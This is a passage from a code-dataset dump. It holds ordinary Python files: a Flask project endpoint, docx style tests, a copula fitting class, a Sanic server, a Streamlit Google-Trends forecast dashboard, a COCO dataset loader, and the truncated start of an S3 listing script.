Blueprint(name='project', import_name=__name__)\n\nlogger = get_logger()\n\n\nclass Project_opt(MethodView):\n\n def check_project_name(self, db, data):\n project_name = data.get('project_name').strip()\n flag = True\n error = ''\n\n if len(project_name) == 0:\n flag = False\n error = '项目名称不可为空!'\n elif len(project_name) > project_name_length:\n flag = False\n error = '创建的项目名称过长!'\n elif db.query(Project).filter(Project.project_name == project_name).first():\n flag = False\n error = '该项目名称已经存在!'\n\n return flag, error\n\n def check_project_description(self, data):\n project_description = data.get('project_description').strip()\n flag = True\n error = ''\n\n if len(project_description) > project_description_length:\n flag = False\n error = '创建的项目描述过长!'\n\n return flag, error\n\n def post(self):\n db = get_db()\n status_code = 201\n ret = {}\n\n data = request.form.to_dict()\n # 验证项目名称\n flag, error = self.check_project_name(db, data)\n if not flag:\n return {'error': error}, 422\n # 验证项目描述\n flag, error = self.check_project_description(data)\n if not flag:\n return {'error': error}, 422\n # 添加项目数据\n data['user_id'] = session.get('user_id')\n save_data_to_db(db, [Project(**data)])\n\n return ret, status_code\n\n\napp.add_url_rule(rule='/api/manager/project/', endpoint='project', view_func=Project_opt.as_view(name='project'))\n","sub_path":"Blueprint/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"264239965","text":"from nose.tools import istest, assert_equal\n\nfrom mammoth.docx.xmlparser import element as xml_element\nfrom mammoth.docx.styles_xml import read_styles_xml_element\n\n\n@istest\ndef paragraph_style_is_null_if_no_style_with_that_id_exists():\n element = xml_element(\"w:styles\")\n styles = read_styles_xml_element(element)\n assert_equal(None, styles.find_paragraph_style_by_id(\"Heading1\"))\n\n\n@istest\ndef paragraph_style_can_be_found_by_id():\n element = xml_element(\"w:styles\", {}, [\n _paragraph_style_element(\"Heading1\", \"Heading 1\"),\n ])\n styles = read_styles_xml_element(element)\n assert_equal(\n \"Heading1\",\n styles.find_paragraph_style_by_id(\"Heading1\").style_id\n )\n\n\n@istest\ndef character_style_can_be_found_by_id():\n element = xml_element(\"w:styles\", {}, [\n _character_style_element(\"Heading1Char\", \"Heading 1 Char\"),\n ])\n styles = read_styles_xml_element(element)\n assert_equal(\n \"Heading1Char\",\n styles.find_character_style_by_id(\"Heading1Char\").style_id\n )\n\n\n@istest\ndef paragraph_and_character_styles_are_distinct():\n element = xml_element(\"w:styles\", {}, [\n _paragraph_style_element(\"Heading1\", \"Heading 1\"),\n _character_style_element(\"Heading1Char\", \"Heading 1 Char\"),\n ])\n styles = read_styles_xml_element(element)\n assert_equal(None, styles.find_character_style_by_id(\"Heading1\"))\n assert_equal(None, styles.find_paragraph_style_by_id(\"Heading1Char\"))\n\n\n@istest\ndef styles_include_names():\n element = xml_element(\"w:styles\", {}, [\n _paragraph_style_element(\"Heading1\", \"Heading 1\"),\n ])\n styles = read_styles_xml_element(element)\n assert_equal(\n \"Heading 1\",\n styles.find_paragraph_style_by_id(\"Heading1\").name\n )\n\n\n@istest\ndef style_name_is_none_if_name_element_does_not_exist():\n element = xml_element(\"w:styles\", {}, [\n _style_without_name_element(\"paragraph\", \"Heading1\"),\n _style_without_name_element(\"character\", \"Heading1Char\")\n ])\n styles = read_styles_xml_element(element)\n assert_equal(None, styles.find_paragraph_style_by_id(\"Heading1\").name)\n assert_equal(None, styles.find_character_style_by_id(\"Heading1Char\").name)\n\n\ndef _paragraph_style_element(style_id, name):\n return _style_element(\"paragraph\", style_id, name)\n\ndef _character_style_element(style_id, name):\n return _style_element(\"character\", style_id, name)\n\ndef _style_element(element_type, style_id, name):\n children = [xml_element(\"w:name\", {\"w:val\": name}, [])]\n return _style_element_with_children(element_type, style_id, children)\n\ndef _style_without_name_element(element_type, style_id):\n return _style_element_with_children(element_type, style_id, [])\n\ndef _style_element_with_children(element_type, style_id, children):\n attributes = {\"w:type\": element_type, \"w:styleId\": style_id}\n return xml_element(\"w:style\", attributes, children)\n","sub_path":"tests/docx/styles_xml_tests.py","file_name":"styles_xml_tests.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"45245524","text":"##\n# \\brief Pair Copula.\n# Bivariate distribution base class.\nfrom __future__ import print_function, absolute_import\nimport numpy as np\nfrom six import iteritems\nfrom scipy.stats import kendalltau, spearmanr, pearsonr\nfrom scipy.stats import gaussian_kde\nfrom scipy.stats.mstats import rankdata\n# COPULA IMPORTS\ntry:\n from starvine.bvcopula.copula_factory import Copula\nexcept:\n from copula_factory import Copula\n\n\nclass PairCopula(object):\n \"\"\"!\n @brief Stores bivariate data for pair copula construction.\n Contains methods to:\n - rank data transform\n - rotate data\n - remove nan or inf data points\n - plot bivarate data\n - fit copula to bivariate (ranked) data\n - compute basic bivariate statistics (eg. kendall's tau)\n\n Note: Depends on pandas for some useful statistical and plotting\n functionality.\n \"\"\"\n def __init__(self, x, y, weights=None, **kwargs):\n \"\"\"!\n @brief Bivariate data set init.\n @param x np_1darray first marginal data set\n @param y np_1darray second marginal data set\n @param weights np_1darray (optional) data weights\n normalized or unormalized weights accepted\n Note: len(u) == len(v) == len(weights)\n \"\"\"\n self.copulaModel, self.copulaParams = None, (None, None, )\n #\n self.id = kwargs.pop(\"id\", None)\n self.x = np.array(x)\n self.y = np.array(y)\n self.u, self.v = None, None # ranked data\n # normalize weights (weights must sum to 1.0)\n self.weights = weights\n if self.weights is not None:\n self.weights = self.weights / np.sum(self.weights)\n # init default copula family\n \"\"\"\n TODO: fix rotated gumbel copula\n defaultFamily = {'t': 0,\n 'gauss': 0,\n 'frank': 0,\n 'frank-90': 1,\n 'frank-180': 2,\n 'frank-270': 3,\n 'gumbel': 0,\n 'gumbel-90': 1,\n 'gumbel-180': 2,\n 'gumbel-270': 3,\n 'clayton': 0,\n 'clayton-90': 1,\n 'clayton-180': 2,\n 'clayton-270': 3,\n }\n \"\"\"\n defaultFamily = {'t': 0,\n 'gauss': 0,\n 'frank': 0,\n 'frank-90': 1,\n 'frank-180': 2,\n 'frank-270': 3,\n 'clayton': 0,\n 'clayton-90': 1,\n 'clayton-180': 2,\n 'clayton-270': 3,\n 'gumbel': 0,\n 'gumbel-90': 1,\n 'gumbel-180': 2,\n 'gumbel-270': 3,\n }\n #\n self.setTrialCopula(kwargs.pop(\"family\", defaultFamily))\n # Rank transform data\n self.rank(kwargs.pop(\"rankMethod\", 0))\n # default rotation\n self.setRotation(kwargs.pop(\"rotation\", 0))\n self.rotateData(self.u, self.v)\n\n def rank(self, method=0):\n \"\"\"!\n @brief rank transfom the data\n @param method int\n if == 0: use standard rank transform,\n else: use CDF data transform.\n \"\"\"\n self.rankMethod = method\n if method == 0:\n self.u = rankdata(self.x) / (len(self.x) + 1)\n self.v = rankdata(self.y) / (len(self.y) + 1)\n else:\n # use alternate CDF rank transform method\n kde_x = gaussian_kde(self.x)\n kde_y = gaussian_kde(self.y)\n u_hat = np.zeros(len(self.x))\n v_hat = np.zeros(len(self.y))\n for i, (xp, yp) in enumerate(zip(self.x, self.y)):\n u_hat[i] = kde_x.integrate_box_1d(-np.inf, xp)\n v_hat[i] = kde_y.integrate_box_1d(-np.inf, yp)\n self.u = u_hat\n self.v = v_hat\n\n def rankInv(self):\n \"\"\"!\n @brief Inverse rank transform data\n back to original scale.\n \"\"\"\n pass\n\n def setTrialCopula(self, family):\n self.trialFamily = family\n self.copulaBank = {}\n for name, rotation in iteritems(self.trialFamily):\n self.copulaBank[name] = Copula(name, rotation)\n\n def empKTau(self):\n \"\"\"!\n @brief Returns emperical kendall's tau of rank transformed data.\n @return float Kendall's tau rank correlation coeff\n \"\"\"\n self.empKTau_, self.pval_ = kendalltau(self.UU, self.VV)\n return self.empKTau_, self.pval_\n\n def empSRho(self):\n \"\"\"!\n @brief Returns emperical spearman rho, the rank correlation coefficient.\n @return float Spearman's rank correlation coeff\n \"\"\"\n self.empSRho_, self.pval_ = spearmanr(self.u, self.v)\n return self.empSRho_, self.pval_\n\n def empPRho(self):\n \"\"\"!\n @brief Returns linear correlation coefficient, pearson's rho.\n @return float pearson's correlation coefficient\n \"\"\"\n self.empPRho_, self.pval_ = pearsonr(self.x, self.y)\n return self.empPRho_, self.pval_\n\n def copulaTournament(self, criterion='AIC', **kwargs):\n \"\"\"!\n @brief Determines the copula that best fits the rank transformed data\n based on the AIC criterion.\n All Copula in self.trialFamily set are considered.\n \"\"\"\n vb = kwargs.pop(\"verbosity\", True)\n self.empKTau()\n if self.pval_ >= 0.05 and self.weights is None:\n print(\"Independence Coplua selected\")\n goldCopula = self.copulaBank[\"gauss\"]\n goldParams = self.fitCopula(goldCopula)\n self.copulaModel = goldCopula\n self.copulaParams = goldParams\n if vb: print(\"ID: %s. %s copula selected. fitted params=\"\n % (str(self.id), goldCopula.name) + str(goldParams[1]))\n if vb: print(\"-------------------------------------------\")\n # return self.copulaBank['indep']\n return (self.copulaModel, self.copulaParams)\n # Find best fitting copula as judged by the AIC\n maxAIC, goldCopula, goldParams = 0, None, None\n for trialCopulaName, rotation in iteritems(self.trialFamily):\n if vb: print(\"Fitting trial copula \" + trialCopulaName + \"...\", end=\"\")\n copula = self.copulaBank[trialCopulaName]\n fittedCopulaParams = self.fitCopula(copula)\n trialAIC = abs(fittedCopulaParams[2])\n if vb: print(\" |AIC|: \" + str(trialAIC))\n if trialAIC > maxAIC:\n goldCopula = copula\n goldParams = fittedCopulaParams\n maxAIC = trialAIC\n if vb: print(\"ID: %s. %s copula selected. fitted params=\"\n % (str(self.id), goldCopula.name) + str(goldParams[1])\n + \" rotation=\" + str(goldParams[3]))\n if vb: print(\"-------------------------------------------\")\n self.copulaModel = goldCopula\n self.copulaParams = goldParams\n return (self.copulaModel, self.copulaParams)\n\n def fitCopula(self, copula, thetaGuess=(None, None, )):\n \"\"\"!\n @brief fit specified copula to data.\n @param copula CopulaBase Copula instance\n @param thetaGuess tuple (optional) initial guess for copula params\n @return (copula type string, fitted copula params np_array)\n \"\"\"\n thetaHat, successFlag = copula.fitMLE(self.UU, self.VV, *thetaGuess, weights=self.weights)\n if successFlag:\n AIC = copula._AIC(self.UU, self.VV, 0, *thetaHat, weights=self.weights)\n else:\n AIC = 0\n self.copulaModel = copula\n return (copula.name, thetaHat, AIC, copula.rotation, successFlag)\n\n def rotateData(self, u, v, rotation=-1):\n \"\"\"!\n @brief Rotates the ranked data on the unit square.\n @param u Ranked data vector\n @param v Ranked data vector\n @param rotation int 1==90deg, 2==180deg, 3==270, 0==0deg\n \"\"\"\n if rotation >= 0:\n self.setRotation(rotation)\n self.UU = np.zeros(u.shape) # storage for rotated u\n self.VV = np.zeros(v.shape) # storage for rotated v\n if self.rotation == 1:\n # 90 degree rotation (flip U)\n self.UU = 1.0 - u\n self.VV = v + 1 - 1\n elif self.rotation == 2:\n # 180 degree rotation (flip U, flip V)\n self.UU = 1.0 - u\n self.VV = 1.0 - v\n elif self.rotation == 3:\n # 270 degree rotation (flip V)\n self.UU = u + 1 - 1\n self.VV = 1.0 - v\n else:\n self.UU = u + 1 - 1\n self.VV = v + 1 - 1\n return (self.UU, self.VV)\n\n def setRotation(self, rotation=0):\n \"\"\"!\n @brief Set the copula's orientation:\n 0 == 0 deg\n 1 == 90 deg rotation\n 2 == 180 deg rotation\n 3 == 270 deg rotation\n Allows for modeling negative dependence with the\n frank, gumbel, and clayton copulas (Archimedean Copula family is\n non-symmetric)\n \"\"\"\n if rotation < 0 or rotation > 3:\n print(\"Invalid Rotation: Valid roations are in [0, 1, 2, 3]\")\n raise RuntimeError\n self.rotation = rotation\n","sub_path":"starvine/bvcopula/pc_base.py","file_name":"pc_base.py","file_ext":"py","file_size_in_byte":9556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"476011873","text":"from sanic import Sanic\nfrom api import api_v1\nimport configparser\n\nfrom sanic_cors import CORS, cross_origin\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\n\napp = Sanic('engine')\napp.blueprint(api_v1)\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": config['app']['origins'].split(',')}})\n# CORS(app)\n\nif __name__ == \"__main__\":\n app.run(\n debug=config['app']['debug'] == 'true',\n host=config['app']['host'],\n port=int(config['app']['port']),\n workers=int(config['app']['workers'])\n )\n","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"564757055","text":"import streamlit as st\nimport pandas as pd\nimport altair as alt\nimport numpy as np\nfrom sqlalchemy import create_engine\nimport base64\nfrom datetime import date\n\nimport toml\n#data_toml = toml.load(\"config.toml\")\naccurancy = st.secrets['accurancy']\n\nrange_forecast = st.secrets['range_forecast']\ngreater_than_trend = st.secrets['greater_than_trend']\ngreater_than_feracast = st.secrets['greater_than_feracast']\nsite_url = st.secrets['site_url']\nn_keywords = st.secrets['n_keywords']\n\nhost = st.secrets['host']\ndatabase = st.secrets['database']\nuser = st.secrets['user']\npassword = st.secrets['password']\nport= st.secrets['port']\npostgre_complete_url = st.secrets['postgre_complete_url']\n\n\ndef _max_width_():\n max_width_str = f\"max-width: 1500px;\"\n st.markdown(\n f\"\"\"\n \n \"\"\",\n unsafe_allow_html=True, \n )\n_max_width_()\n\nhide_streamlit_style = \"\"\"\n \n \"\"\"\nst.markdown(hide_streamlit_style, unsafe_allow_html=True)\n\n#Intestazione Pagina\n#\n#\nst.title('Predict Dashboard')\n\n#H1\nst.write('Previsione dei trend')\n\n# creazione df geerale\nengine = create_engine(postgre_complete_url)\ndf_general = pd.read_sql_query(f\"SELECT * FROM wtforecastgeneral WHERE site = '{site_url}';\",con=engine)\n\n#df trend\ndf_trend = df_general.copy()\ndf_to_graph = None\nfor index, row in df_trend.iterrows():\n gt_dates_trend = df_trend['gt_dates']\n df_dit = pd.DataFrame.from_dict(row['gt_dates'], orient='columns')\n df_dit['index'] = pd.to_datetime(df_dit['index'], unit='ms')\n df_dit = df_dit.T\n new_header = df_dit.iloc[0]\n df_dit = df_dit[1:]\n df_dit.columns = new_header\n if df_to_graph is not None:\n df_to_graph = pd.concat([df_to_graph, df_dit], ignore_index=True)\n else:\n df_to_graph = df_dit.copy()\ntotal_trend = df_to_graph.sum()\ntotal_trend = total_trend.to_frame()\ntotal_trend.reset_index(inplace=True)\ntotal_trend = total_trend.rename(columns={'index': 'date',0: 'trend' })\ntotal_trend['date'] = total_trend['date'].astype('datetime64[ns]')\ntotal_trend['trend'] = total_trend['trend'].astype('float')\n#total_trend\nchart_trend = alt.Chart(total_trend).mark_line().encode(\n x=alt.X('date'),\n y=alt.Y('trend')\n).properties(title=\"Google Trend\")\ngtrend_regline_chart = chart_trend + chart_trend.transform_regression('date', 'trend').mark_line()\n#st.altair_chart(gtrend_regline_chart, use_container_width=True)\n\n# df predict\ndf_predict = df_general.copy()\ndf_to_graph = None\nfor index, row in df_predict.iterrows():\n gt_dates_predict = df_predict['forecast_dates']\n df_dit = pd.DataFrame.from_dict(row['forecast_dates'], orient='columns')\n df_dit['index'] = pd.to_datetime(df_dit['index'], unit='ms')\n df_dit = df_dit.T\n new_header = df_dit.iloc[0]\n df_dit = df_dit[1:]\n df_dit.columns = new_header\n if df_to_graph is not None:\n df_to_graph = pd.concat([df_to_graph, df_dit], ignore_index=True)\n else:\n df_to_graph = df_dit.copy()\ntotal_predict = df_to_graph.sum()\ntotal_predict = total_predict.to_frame()\ntotal_predict.reset_index(inplace=True)\ntotal_predict = total_predict.rename(columns={'index': 'date',0: 'predict' })\ntotal_predict['date'] = total_predict['date'].astype('datetime64[ns]')\ntotal_predict['predict'] = total_predict['predict'].astype('float')\n#total_predict\n\nchart_predict = alt.Chart(total_predict).mark_line().encode(\n x=alt.X('date'),\n y=alt.Y('predict')\n).properties(title=\"Trend Forecast\")\ngtrend_regline_chart = chart_predict + chart_predict.transform_regression('date', 'predict').mark_line()\n#st.altair_chart(gtrend_regline_chart, use_container_width=True)\n\n# Full Chart\nfull_df = pd.merge(total_predict, total_trend, left_on='date', right_on='date', how='left')\n#full_df\na = alt.Chart(full_df).mark_area(opacity=0.6, color='#25f4ee').encode(x='date', y='trend')\nb = alt.Chart(full_df).mark_area(opacity=1, color='#fe2c55').encode(x='date', y='predict')\nc = alt.layer(b, a).properties(title=\"Forecast and Trend Comparison\")\n\nst.write('Legenda: azzurro Google Trends, rosso Previsionale')\nst.altair_chart(c, use_container_width=True)\n\n\nst.write('---------------------------------------------------')\n\n#\n#\n# Tabelle generali\n\n# creazione df generale\nengine_table = create_engine(postgre_complete_url)\ndf_general_table = pd.read_sql_query(f\"SELECT * FROM wtforecastdetails WHERE site = '{site_url}' AND type_gt_or_forecast = 'type_gt' AND gt_accuracy <= {accurancy};\",con=engine_table)\n\nst.write('Trend Attuali')\ndf_last_trend = df_general_table.copy()\ndf_last_trend = df_last_trend[['keyword','ga_search_volume','ga_competition','gsc_avg_pos','gsc_sum_imp','gsc_sum_clic','last_trend','gsc_page']].copy()\n#df_last_trend\ndf_last_trend = df_last_trend.sort_values(by=['ga_search_volume','ga_competition'], ascending=False)\nst.dataframe(data=df_last_trend, width=1500, height=768)\n\n\ndef get_table_download_link_csv(df_last_trend):\n csv = df_last_trend.to_csv(sep=';', decimal=',', index=False).encode('UTF-8')\n b64 = base64.b64encode(csv).decode()\n today = date.today()\n d4 = today.strftime(\"%b-%d-%Y\")\n href = f'Download'\n return href\nst.markdown(get_table_download_link_csv(df_last_trend), unsafe_allow_html=True)\nst.write('---------------------------------------------------')\n\n\nengine_table = create_engine(postgre_complete_url)\ndf_general_table = pd.read_sql_query(f\"SELECT * FROM wtforecastdetails WHERE site = '{site_url}' AND type_gt_or_forecast = 'type_forecast' AND gt_accuracy <= {accurancy};\",con=engine_table)\n\nst.write('Trend Futuri')\ndf_last_forecast = df_general_table.copy()\ndf_last_forecast = df_last_forecast[['keyword','ga_search_volume','ga_competition','gsc_avg_pos','gsc_sum_imp','gsc_sum_clic','last_forecast','gsc_page']].copy()\n#df_last_forecast\ndf_last_forecast = df_last_forecast.sort_values(by=['ga_search_volume','ga_competition'], ascending=False)\nst.dataframe(data=df_last_forecast, width=1500, height=768)\n\ndef get_table_download_link_csv(df_last_forecast):\n csv = df_last_forecast.to_csv(sep=';', decimal=',', index=False).encode('UTF-8')\n b64 = base64.b64encode(csv).decode()\n today = date.today()\n d4 = today.strftime(\"%b-%d-%Y\")\n href = f'Download'\n return href\nst.markdown(get_table_download_link_csv(df_last_forecast), unsafe_allow_html=True)\n\n\n\n","sub_path":"11_streamlit_sharing.py","file_name":"11_streamlit_sharing.py","file_ext":"py","file_size_in_byte":6731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"54855122","text":"import torch\r\nfrom torch.utils.data import Dataset, DataLoader\r\nimport torchvision.transforms as transforms\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom PIL import Image, ImageDraw\r\nimport os\r\nimport torchvision\r\n\r\ndef imshow(img):\r\n img = img / 2 + 0.5 # unnormalize\r\n npimg = img.numpy()\r\n plt.imshow(np.transpose(npimg, (1, 2, 0)))\r\n \r\n\r\nclass CocoData(Dataset):\r\n \"\"\"\r\n Args:\r\n root (string): Root directory where images are downloaded to.\r\n annFile (string): Path to json annotation file.\r\n transform (callable, optional): A function/transform that takes in an PIL image\r\n and returns a transformed version. E.g, ``transforms.ToTensor``\r\n target_transform (callable, optional): A function/transform that takes in the\r\n target and transforms it.\r\n category_names : name of the categories desired dataset consists\r\n final_img_size : Dataset image size, default: 128\r\n \r\n \r\n Return: \r\n 'image' : 3x128x128\r\n 'segmentation mask' : num_catx128x128 --- only one instance for specific category (one instance for each category)\r\n 'category' : multiple categories (e.g. zebra, giraffe)\r\n \r\n \"\"\"\r\n\r\n def __init__(self, root, annFile, transform=None, target_transform=None, category_names = None, final_img_size=128, time_step=1):\r\n from pycocotools.coco import COCO\r\n self.root = root\r\n self.coco = COCO(annFile)\r\n self.ids = list(self.coco.imgs.keys())\r\n self.transform = transform\r\n self.target_transform = target_transform\r\n self.final_img_size = final_img_size \r\n self.time_step = time_step\r\n self.transform2 = transforms.Compose([\r\n transforms.Scale((final_img_size,final_img_size)),\r\n transforms.ToTensor(),\r\n ])\r\n \r\n \r\n if category_names == None:\r\n self.category = None\r\n self.ids = list(self.coco.imgs.keys())\r\n else:\r\n self.category = self.coco.getCatIds(catNms=category_names) #e.g. [22,25]\r\n \r\n self.ids = []\r\n self.cat = []\r\n for x in self.category:\r\n self.ids += self.coco.getImgIds(catIds=x )\r\n self.cat += [x]*len(self.coco.getImgIds(catIds=x )) #e.g. [22,22,...,22]\r\n\r\n \r\n def __getitem__(self, index):\r\n \"\"\"\r\n Args:\r\n index (int): Index\r\n\r\n Returns:\r\n tuple: Tuple (image, target). target is the object returned by ``coco.loadAnns``.\r\n \"\"\"\r\n coco = self.coco\r\n #Delete next line \r\n #index = 572 + 109\r\n img_id = self.ids[index]\r\n \r\n ann_ids = coco.getAnnIds(imgIds=img_id)\r\n target = coco.loadAnns(ann_ids)\r\n path = coco.loadImgs(img_id)[0]['file_name']\r\n \r\n #print(img_id)\r\n \r\n img = Image.open(os.path.join(self.root, path)).convert('RGB')\r\n img_size = img.size\r\n img_size_x = img_size[0]\r\n img_size_y = img_size[1]\r\n #seg_masks = torch.zeros([len(self.category),self.final_img_size,self.final_img_size])\r\n \r\n instance_types = []\r\n \r\n for i in range(len(target)): \r\n instance = target[i]\r\n instance_types.append(instance['category_id'])\r\n\r\n idx_list = [i for i in range(len(instance_types)) if (instance_types[i] in self.category and len(target[i]['segmentation'])==1)]\r\n num_object = len(idx_list)\r\n \r\n seg_masks = torch.zeros([num_object,len(self.category),self.final_img_size,self.final_img_size])\r\n bboxes = torch.zeros([num_object,len(self.category),self.final_img_size,self.final_img_size])\r\n ins_area = torch.zeros([num_object])\r\n \r\n fg_category = 9999*torch.ones([num_object])\r\n for i in range(num_object): \r\n idx = idx_list[np.random.choice(len(idx_list),1)[0]]\r\n idx_list.remove(idx)\r\n instance = target[idx]\r\n \r\n ins_area[i] = instance['area']/(img_size_x*img_size_y)\r\n \r\n mask = Image.new('L', (img_size_x, img_size_y))\r\n for j in range(len(instance['segmentation'])):\r\n poly = instance['segmentation'][j]\r\n ImageDraw.Draw(mask).polygon(poly, outline=1, fill=1)\r\n \r\n mask= self.transform2(mask)\r\n if torch.max(mask) != 0:\r\n mask = mask/torch.max(mask)\r\n \r\n seg_masks[i,self.category.index(instance['category_id']),:,:] = mask.squeeze(0)\r\n fg_category[i] = self.category.index(instance['category_id'])\r\n \r\n bbox = instance['bbox']\r\n bbox_mask = Image.new('L', (img_size_x, img_size_y))\r\n ImageDraw.Draw(bbox_mask).rectangle([bbox[0],bbox[1],bbox[0]+bbox[2],bbox[1]+bbox[3]], outline=1, fill=1)\r\n bbox_mask= self.transform2(bbox_mask)\r\n if torch.max(bbox_mask) != 0:\r\n bbox_mask = bbox_mask/torch.max(bbox_mask)\r\n bboxes[i,self.category.index(instance['category_id']),:,:] = bbox_mask.squeeze(0)\r\n \r\n if self.transform is not None:\r\n img = self.transform(img)\r\n\r\n\r\n\r\n seg_masks = torch.clamp(seg_masks,0,1)\r\n bboxes = torch.clamp(bboxes,0,1)\r\n \r\n sample = {'image': img, 'seg_mask': seg_masks, 'bboxes': bboxes, 'fg_category': fg_category, 'num_object':num_object, 'ins_area':ins_area}\r\n return sample\r\n\r\n def __len__(self):\r\n return len(self.ids)\r\n\r\n def discard_small(self, min_area, max_area=1):\r\n #category_id = self.coco.getCatIds(catNms=category_name)\r\n temp = []\r\n for img_id in self.ids:\r\n ann_ids = self.coco.getAnnIds(imgIds=img_id)\r\n target = self.coco.loadAnns(ann_ids)\r\n instance_types = []\r\n valid_mask = False\r\n \r\n path = self.coco.loadImgs(img_id)[0]['file_name']\r\n img = Image.open(os.path.join(self.root, path))\r\n img_size = img.size\r\n img_size_x = img_size[0]\r\n img_size_y = img_size[1]\r\n\r\n total_fg_area = 0\r\n total_fg_area_relevant = 0\r\n \r\n for i in range(len(target)): \r\n instance = target[i]\r\n total_fg_area += instance['area']\r\n instance_types.append(instance['category_id'])\r\n if instance['category_id'] in self.category and len(instance['segmentation'])==1:\r\n total_fg_area_relevant += instance['area']\r\n valid_mask = True\r\n if (instance['category_id'] in self.category) and (type(instance['segmentation']) is not list):\r\n valid_mask = False\r\n break \r\n\r\n if valid_mask and total_fg_area_relevant/(img_size_x*img_size_y) > min_area and total_fg_area/(img_size_x*img_size_y) < max_area:\r\n temp.append(img_id)\r\n \r\n print(str(len(self.ids)) + '-->' + str(len(temp)))\r\n self.ids = temp\r\n \r\n\r\n def discard_bad_examples(self, path): \r\n file_list = open(path, \"r\")\r\n bad_examples = file_list.readlines()\r\n for i in range(len(bad_examples)):\r\n bad_examples[i] = int(bad_examples[i][:-1])\r\n\r\n temp = []\r\n for img_id in self.ids:\r\n if not (img_id in bad_examples):\r\n temp.append(img_id)\r\n \r\n print(str(len(self.ids)) + '-->' + str(len(temp)))\r\n self.ids = temp\r\n print('Bad examples are left out!') \r\n\r\n def discard_num_objects(self,num_min_obj=0, num_max_obj=1):\r\n \r\n temp = []\r\n for img_id in self.ids:\r\n ann_ids = self.coco.getAnnIds(imgIds=img_id)\r\n target = self.coco.loadAnns(ann_ids)\r\n instance_types = []\r\n \r\n for i in range(len(target)): \r\n instance = target[i]\r\n instance_types.append(instance['category_id'])\r\n \r\n idx_list = [i for i in range(len(instance_types)) if (instance_types[i] in self.category and len(target[i]['segmentation'])==1)]\r\n num_object = len(idx_list)\r\n \r\n if num_object>num_min_obj and num_object <= num_max_obj:\r\n temp.append(img_id)\r\n \r\n print(str(len(self.ids)) + '-->' + str(len(temp)))\r\n self.ids = temp\r\n \r\n \r\n#-------------------------Example-----------------------------------------\r\nif __name__ == '__main__':\r\n transform = transforms.Compose([transforms.Resize((128,128)),\r\n transforms.ToTensor(),\r\n #transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\r\n ]) \r\n dataset = CocoData(root = 'C:/Users/motur/coco/images/train2017',\r\n annFile = 'C:/Users/motur/coco/annotations/instances_train2017.json',\r\n category_names = ['giraffe','elephant','zebra','sheep','cow','bear'],\r\n transform=transform, time_step = 5)\r\n \r\n #dataset.discard_small(0.01)\r\n train_loader = DataLoader(dataset, batch_size=1, shuffle=False) \r\n print('Number of samples: ', len(dataset))\r\n #Discarding images contain small instances \r\n dataset.discard_small(min_area=0.0, max_area= 1)\r\n #dataset.discard_bad_examples('bad_examples_list.txt')\r\n #dataset.discard_num_objects()\r\n\r\n path1 = 'C:/Users/motur/coco/mask/bbox_sheep/'\r\n path2 = 'C:/Users/motur/coco/images_gt/gt_train_2/'\r\n \r\n num_object = []\r\n MIN_AREA = 0.01\r\n count = 0\r\n for num_iter, sample_batched in enumerate(train_loader,0):\r\n #image= sample_batched['image'][0]\r\n #imshow(torchvision.utils.make_grid(image))\r\n num_object.append(sample_batched['num_object'][0])\r\n #plt.pause(0.001)\r\n #y_all = sample_batched['seg_mask'][0]\r\n #bbox_all = sample_batched['bboxes'][0]\r\n #ins_area = sample_batched['ins_area'][0]\r\n #num_fg_obj = y_all.size()[0]\r\n #torchvision.utils.save_image(image, path2 + str(count) + '.png', nrow=1, padding=0, normalize=True, range=None, scale_each=False, pad_value=0)\r\n count +=1 \r\n\r\n# imshow(torchvision.utils.make_grid(mask[0,0,:,:]))\r\n# plt.pause(0.001)\r\n# imshow(torchvision.utils.make_grid(mask[0,1,:,:]))\r\n# plt.pause(0.001)\r\n# imshow(torchvision.utils.make_grid(mask[1,0,:,:]))\r\n# plt.pause(0.001)\r\n# imshow(torchvision.utils.make_grid(mask[1,1,:,:]))\r\n# plt.pause(0.001)\r\n #print(sample_batched['num_object'][0])\r\n #print(sample_batched['fg_category'][0])\r\n# for t in range(num_fg_obj):\r\n# y_ = y_all[t,:,:,:]\r\n# y_reduced = torch.sum(y_,0).clamp(0,1).view(1,128,128)\r\n# bbox_ = bbox_all[t,:,:,:]\r\n# bbox_reduced = torch.sum(bbox_,0).clamp(0,1).view(1,128,128)\r\n# \r\n# if ins_area[t]>MIN_AREA:\r\n# fixed_p1 = path1 + str(count) + '.png'\r\n# fixed_p2 = path2 + str(count) + '.png'\r\n# count += 1\r\n# torchvision.utils.save_image(bbox_reduced, fixed_p1, nrow=1, padding=0, normalize=True, range=None, scale_each=False, pad_value=0)\r\n# torchvision.utils.save_image(y_reduced, fixed_p2, nrow=1, padding=0, normalize=True, range=None, scale_each=False, pad_value=0)\r\n \r\n \r\n num_object = np.array(num_object)\r\n print(np.max(num_object))\r\n print(np.mean(num_object))\r\n print(np.median(num_object))\r\n plt.hist(num_object)\r\n plt.xticks(range(1, 22))\r\n plt.show()\r\n plt.savefig('num_obj.png')\r\n \r\n \r\n","sub_path":"data_loader_bgfg_2.py","file_name":"data_loader_bgfg_2.py","file_ext":"py","file_size_in_byte":11992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"477646817","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nimport subprocess\nimport time\nimport os\nimport time\nimport re\nimport sys\nfrom IPython.display import clear_output\n\n\nclass Empty_File_S3():\n \n def __init__(self,bucket=\"testinternalrealestate\",exclude=[],condo=False):\n self.bucket = bucket\n self.exclude = exclude\n self.condo = condo\n \n def get_list(self):\n exclude = self.exclude\n condo = self.condo\n cmdln = \"aws s3 ls s3://\" + self.bucket +\"/ --region us-east-2 \"\n p = subprocess.Popen(cmdln, shell=True, stdout=subprocess.PIPE, 